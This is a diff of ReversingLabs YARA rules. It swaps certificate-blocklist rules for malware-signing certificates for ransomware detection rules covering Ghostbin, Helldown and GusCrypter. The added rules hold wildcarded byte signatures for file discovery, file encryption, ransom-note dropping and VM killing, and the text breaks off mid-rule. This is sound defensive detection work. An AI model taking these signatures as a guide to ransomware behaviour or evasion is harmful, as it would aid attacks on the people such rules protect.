-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6254-L6270"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1cbdf39a873c83d2b55723215fb4930a3ce23b6cab2d71a6cd5f16b2721e30f9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara#L1-L61"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3881e1c83ac2a31fdd8a081d3e6e6ea759771dbc183c3af9528930619bcddf9e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ghostbin"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" and 1600650000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "daae5f42-59ff-5838-9444-93357eaa9d60"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6272-L6288"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "17996dd0ec81623dbd4eeea98f9bbe37c11c911ca840833ecb9301bb0a9ddb52"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$setup_env = {
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C
+            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? DE ?? 2A
+        }
+		$encrypt_files = {
+            73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ??
+            ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08
+            09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A
+        }
+		$find_files = {
+            02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B
+            2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ??
+            ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B
+            07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
+            11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ??
+            DE ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" and 1601254800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Helldown : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Helldown ransomware."
 		author = "ReversingLabs"
-		id = "f91ecc17-7406-552a-8864-c9e1657a5ca9"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "aca11cf1-2d73-5599-8027-a52b9dcd4757"
+		date = "2025-01-20"
+		modified = "2025-01-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6290-L6308"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cffc234be78446191dd5f5990db9f17c7e28eeaa3e16f1eb8ad4ed1e58fdc25e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Linux.Ransomware.Helldown.yara#L1-L127"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b5572f537c87d113886d79768cfe89e46c00063333de612a4547c9a80f5826e1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Helldown"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            41 56 41 55 41 54 49 89 FC 55 53 0F 1F 44 00 ?? 49 8B 74 24 ?? 49 8B 3C 24 E8 ?? ??
+            ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8B 38 E8 ?? ?? ?? ?? 48 85 C0 48 89 C3
+            0F 84 ?? ?? ?? ?? 66 90 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 84 ?? ?? ?? ??
+            0F B6 40 ?? 3C ?? 0F 84 ?? ?? ?? ?? 3C ?? 75 ?? 49 83 C6 ?? 4C 89 F7 E8 ?? ?? ?? ??
+            85 C0 74 ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ?? ?? ?? ?? 49 8D 7C 05
+            ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
+            ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ??
+            4C 89 EF 49 89 C6 E8 ?? ?? ?? ?? 49 8B 54 24 ?? 49 8B 7C 24 ?? 48 89 C6 4C 89 70 ??
+            E8 ?? ?? ?? ?? 49 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 0F 84 ?? ?? ?? ?? 4C 89 EF E8
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49 89 C6 0F 85 ?? ?? ?? ?? 0F 1F 40 ??
+            48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 41 80 7E ??
+            ?? 0F 84 ?? ?? ?? ?? 48 8B 7D ?? 49 83 C6 ?? E8 ?? ?? ?? ?? 4C 89 F7 49 89 C5 E8 ??
+            ?? ?? ?? 49 8D 7C 05 ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 49 89 C5 48 89 C7 E8 ?? ?? ?? ??
+            4C 89 EF E8 ?? ?? ?? ?? 4C 89 F6 4C 89 EF 66 41 C7 44 05 ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            89 EF E8 ?? ?? ?? ?? 4D 85 ED 49 89 C6 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 8B 54 24 ??
+            49 8B 3C 24 4C 89 F6 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 5B 5D 41 5C 41 5D 41 5E
+            C3
+        }
+		$encrypt_files_p1 = {
+            41 57 48 89 F8 41 56 41 55 41 54 55 53 48 83 EC ?? 48 89 7C 24 ?? 66 2E 0F 1F 84 00
+            ?? ?? 00 00 48 8B 78 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 72 ?? 48 8B 7A ?? E8 ??
+            ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 30 4C 8B 68 ?? 48 85 F6 0F
+            84 ?? ?? ?? ?? 48 89 F7 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
+            89 44 24 ?? 48 89 C7 31 C0 E8 ?? ?? ?? ?? 85 C0 89 C3 0F 88 ?? ?? ?? ?? 49 81 FD ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 41 BF ?? ?? ?? ?? 44 0F 4C F8 BA ?? ?? ?? ?? 49 8D 85 ?? ??
+            ?? ?? BD ?? ?? ?? ?? 41 BC ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 4C EA B2 ?? 44 0F 4C E2
+            48 3D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 0F 46 EA 44 0F 46 FA 44 0F 46 E0
+            BA ?? ?? ?? ?? 49 81 FD ?? ?? ?? ?? B8 ?? ?? ?? ?? 45 0F 4E E5 48 0F 4E EA 44 0F 4E
+            F8 E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 45 89 E4 48 89 C7 BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 4C 89
+        }
+		$encrypt_files_p2 = {
+            EA 49 89 C4 4C 89 E8 48 C1 FA ?? 45 31 ED 48 F7 FD 31 ED 48 89 44 24 ?? 0F 1F 40 ??
+            31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 E6 89 DF 41 83 C5 ?? E8 ??
+            ?? ?? ?? 48 8B 7C 24 ?? 48 8D 54 24 ?? 31 C9 41 89 C1 4D 89 E0 BE ?? ?? ?? ?? 41 89
+            C6 E8 ?? ?? ?? ?? 31 D2 48 89 EE 89 DF E8 ?? ?? ?? ?? 44 89 F2 4C 89 E6 89 DF E8 ??
+            ?? ?? ?? 48 03 6C 24 ?? 45 39 EF 7F ?? 31 F6 BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48
+            8B 74 24 ?? BA ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 8B 7C 24 ??
+            E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 4D 85 E4 74 ??
+            4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 74 ?? 48 8B
+            7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 30 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
+            48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 8B 54 24
+            ?? 48 8B 32 EB ?? 66 0F 1F 44 00 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F
+        }
+		$drop_ransom_note = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 4C 89 64 24 ?? 4C 89 6C 24 ?? 49 89 FC 48 83 EC ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 00 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? BE ?? ?? ??
+            ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 48 89 C7 48 8B 15 ?? ?? ?? ?? 48 89 C3 31 C0 E8
+            ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 89 DF 48 89 C5 E8 ?? ?? ?? ?? 4C 8D 6C 05 ??
+            31 ED 4D 85 ED 74 ?? 4C 89 EF E8 ?? ?? ?? ?? 4C 89 EA 31 F6 48 89 C7 48 89 C5 E8 ??
+            ?? ?? ?? 4C 89 E6 48 89 EF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48
+            89 DE 48 89 EF C6 40 ?? ?? E8 ?? ?? ?? ?? 31 F6 48 89 EF E8 ?? ?? ?? ?? 85 C0 75 ??
+            48 85 ED 74 ?? 48 89 EF E8 ?? ?? ?? ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 89 DF 48 8B 6C
+            24 ?? 48 8B 5C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? E9 ?? ?? ?? ?? 66 0F
+            1F 44 00 ?? 48 89 EF BA ?? ?? ?? ?? BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 3D ??
+            ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 31 C0 31 C9 BA ?? ?? ?? ?? 41 89 C4 48 89 FE E8 ?? ??
+            ?? ?? 48 8B 40 ?? 4C 8B 68 ?? 4C 89 EF E8 ?? ?? ?? ?? 44 89 E7 48 89 C2 4C 89 EE E8
+            ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 48 8B 5C 24
+            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B 6C 24 ?? 48 83 C4 ?? C3
+        }
+		$kill_virtual_machines_p1 = {
+            41 57 31 C0 B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 89 FD 53 48 81 EC ?? ?? ?? ?? 48 89
+            E7 48 89 E3 F3 48 AB C6 07 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 F6 48
+            89 C7 49 89 C4 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 C1 BE ?? ?? ?? ?? 49 89 C5 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 41 BF ?? ?? ??
+            ?? EB ?? 90 83 FD ?? 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48
+            89 DF E8 ?? ?? ?? ?? 4C 89 F6 48 89 DF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 8D 7D ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0
+            0F 84 ?? ?? ?? ?? 4C 8D 70 ?? BE ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 89 DF C6 00
+            ?? 49 89 C5 4C 89 F9 31 C0 83 FD ?? F3 48 AB 48 8B 05 ?? ?? ?? ?? 48 89 03 48 8B 05
+            ?? ?? ?? ?? 48 89 43 ?? 48 8B 05 ?? ?? ?? ?? 48 89 43 ?? 8B 05 ?? ?? ?? ?? 89 43
+        }
+		$kill_virtual_machines_p2 = {
+            0F B7 05 ?? ?? ?? ?? 66 89 43 ?? 0F B6 05 ?? ?? ?? ?? 88 43 ?? 0F 85 ?? ?? ?? ?? 48
+            89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1
+            EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ??
+            ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ??
+            ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48
+            8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9 ?? C7 01 ?? ?? ?? ?? C6 41 ?? ?? E9 ?? ?? ?? ??
+            0F 1F 40 ?? 48 89 D9 8B 11 48 83 C1 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ??
+            74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 51 ?? 48 0F 44 CA 00 C0 48 83 D9
+            ?? C7 01 ?? ?? ?? ?? 66 C7 41 ?? ?? ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00
+            4D 85 E4 74 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E
+            41 5F C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and ( pe.signatures [ i ] . serial == "00:6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" or pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" ) and 1600176940 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( all of ( $kill_virtual_machines_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Guscrypter : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GusCrypter ransomware."
 		author = "ReversingLabs"
-		id = "c0796bc3-96cd-5d12-a0ee-97d8ed4a3076"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "64aa468c-ec24-58aa-8ea9-23f0cebed227"
+		date = "2020-11-26"
+		modified = "2020-11-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6310-L6326"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "40c80d3b6bedb0b3454e14501745a6e82b6ea9ac202748867a2e937fb79c6f6c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.GusCrypter.yara#L1-L129"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cfe6005028c0e5f5d713af2a549574203678bab2ee48acc1727702bcf91522b1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GusCrypter"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 45 ?? 8B 5D ?? 83 FB ?? 8B 75 ?? 8B 4D ?? 0F 43 C6 83 F9 ?? 75 ?? 80 38 ?? 0F
+            84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? BA ?? ?? ?? ?? 66 39 10 0F
+            84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 66 81 3A ?? ?? 75 ?? 80 7A
+            ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 81 3A ?? ?? ?? ?? 75 ??
+            66 81 7A ?? ?? ?? 75 ?? 80 7A ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 FB ?? 0F
+            43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83
+            EF ?? 73 ?? 8A 01 3A 02 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 F8
+            ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ??
+            66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D
+            ?? 0F 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2
+            ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 4D
+            ?? 8D 45 ?? 83 FB ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
+            ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75
+        }
+		$find_files_p2 = {
+            81 38 ?? ?? ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83
+            F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ??
+            81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ??
+            0F 43 CE 83 7D ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ??
+            83 C2 ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ??
+            83 FB ?? 8D 45 ?? 0F 43 C6 83 7D ?? ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
+            ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 7D
+            ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF
+            ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 75
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ??
+            ?? 8B CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
+            C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B BD ?? ?? ?? ?? C6 45 ?? ?? 83 FB ?? 72 ?? 43 8B C6 81 FB ?? ?? ?? ??
+            72 ?? 8B 76 ?? 83 C3 ?? 2B C6 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
+            15
+        }
+		$encrypt_files_p1 = {
+            88 84 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7C ?? 33 FF 33 F6 8B C6 8A 9C 35 ?? ?? ?? ??
+            99 F7 7D ?? 0F B6 04 0A 03 F8 0F B6 CB 03 F9 81 E7 ?? ?? ?? ?? 79 ?? 4F 81 CF ?? ??
+            ?? ?? 47 8A 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 88 84 35 ?? ?? ?? ?? 46 88 9C 3D ??
+            ?? ?? ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50
+            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8B 4D ?? 32 D2 E8 ?? ?? ?? ??
+            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
+            F8 ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45
+            ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 33 F6
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
+        }
+		$encrypt_files_p2 = {
+            0F BE 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 46 83 C4 ?? 83 FE ?? 7C ?? 53 E8 ?? ?? ??
